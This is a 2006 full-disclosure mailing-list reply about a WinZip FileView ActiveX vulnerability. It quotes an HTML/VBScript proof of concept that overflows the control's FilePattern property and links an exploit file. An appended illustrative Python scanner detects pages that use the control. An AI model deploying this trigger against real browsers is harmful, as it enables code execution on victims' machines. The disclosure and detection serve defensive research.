Message-ID: <20061115141712.11533.qmail@web23312.mail.ird.yahoo.com>
Date: Wed, 15 Nov 2006 14:17:12 +0000 (GMT)
From: Micheal Turner <wh1t3h4t3@...oo.co.uk>
To: Micheal Turner <wh1t3h4t3@...oo.co.uk>, zdi-disclosures@...m.com,
full-disclosure@...ts.grok.org.uk, bugtraq@...urityfocus.com
Subject: Re: ZDI-06-040: WinZip FileView ActiveX Control
Unsafe Method Exposure Vulnerability
here we go, enjoy!
https://prdelka.blackart.org.uk/exploitz/prdelka-vs-MS-winzip.c
--- Micheal Turner <wh1t3h4t3@...oo.co.uk> wrote:
> 7245 correctly resolves this issue; standard stack
> overflow in WZFILEVIEW.FilePattern snatching EIP;
> PoC below;
>
> <HTML>
> <HEAD>
> <TITLE></TITLE>
> </HEAD>
> <BODY>
> <SCRIPT LANGUAGE="VBScript">
> <!--
> Sub WZFILEVIEW_OnAfterItemAdd(Item)
> WZFILEVIEW.FilePattern = "SMASHTHESTACKHERE"
> end sub
> -->
> </SCRIPT>
> <OBJECT ID="WZFILEVIEW" WIDTH=200 HEIGHT=200
> CLASSID="CLSID:A09AE68F-B14D-43ED-B713-BA413F034904">
> </OBJECT>
> </BODY>
> </HTML>
>
>
> -- prdelka
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
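
An added example, not part of the original post or of any WinZip or ZDI code: a defender-side scanner that flags HTML instantiating the FileView control by the CLSID from the quoted PoC and lists script assignments to its FilePattern property. The names `FileViewScanner` and `scan`, and both sample pages, are constructed for illustration.

```python
import re
from html.parser import HTMLParser

# CLSID of the WinZip FileView control, copied from the quoted PoC.
WZFILEVIEW_CLSID = "a09ae68f-b14d-43ed-b713-ba413f034904"

class FileViewScanner(HTMLParser):
    """Collect ids of OBJECT tags bound to the CLSID, plus all script text."""
    def __init__(self):
        super().__init__()
        self.object_ids, self.scripts, self._in_script = [], [], False

    def handle_starttag(self, tag, attrs):
        a = {k: (v or "") for k, v in attrs}
        if tag == "object":
            clsid = re.sub(r"^clsid:", "", a.get("classid", "").strip().lower())
            if clsid.strip("{}") == WZFILEVIEW_CLSID:
                self.object_ids.append(a.get("id", ""))
        elif tag == "script":
            self._in_script = True
            self.scripts.append("")

    def handle_endtag(self, tag):
        if tag == "script":
            self._in_script = False

    def handle_data(self, data):
        if self._in_script:
            self.scripts[-1] += data

def scan(html):
    """Return (object_ids, writes); writes holds (id, right-hand side) per assignment."""
    p = FileViewScanner()
    p.feed(html)
    p.close()
    writes = []
    for oid in filter(None, p.object_ids):
        pat = re.compile(r"\b" + re.escape(oid) + r"\s*\.\s*FilePattern\s*=\s*(.*)", re.I)
        for script in p.scripts:
            writes += [(oid, m.group(1).strip()) for m in pat.finditer(script)]
    return p.object_ids, writes

# Constructed sample page (harmless property value) and a constructed clean page.
SAMPLE = """<script language="VBScript">
Sub Viewer_OnAfterItemAdd(Item)
  Viewer.FilePattern = "*.zip"
End Sub
</script><object id="Viewer" classid="CLSID:A09AE68F-B14D-43ED-B713-BA413F034904"></object>"""
CLEAN = '<object id="x" classid="clsid:00000000-0000-0000-0000-000000000000"></object>'
```

This is static matching only: a page that creates the object or sets the property from generated script is not caught, so a hit is a lead for review and a miss proves nothing.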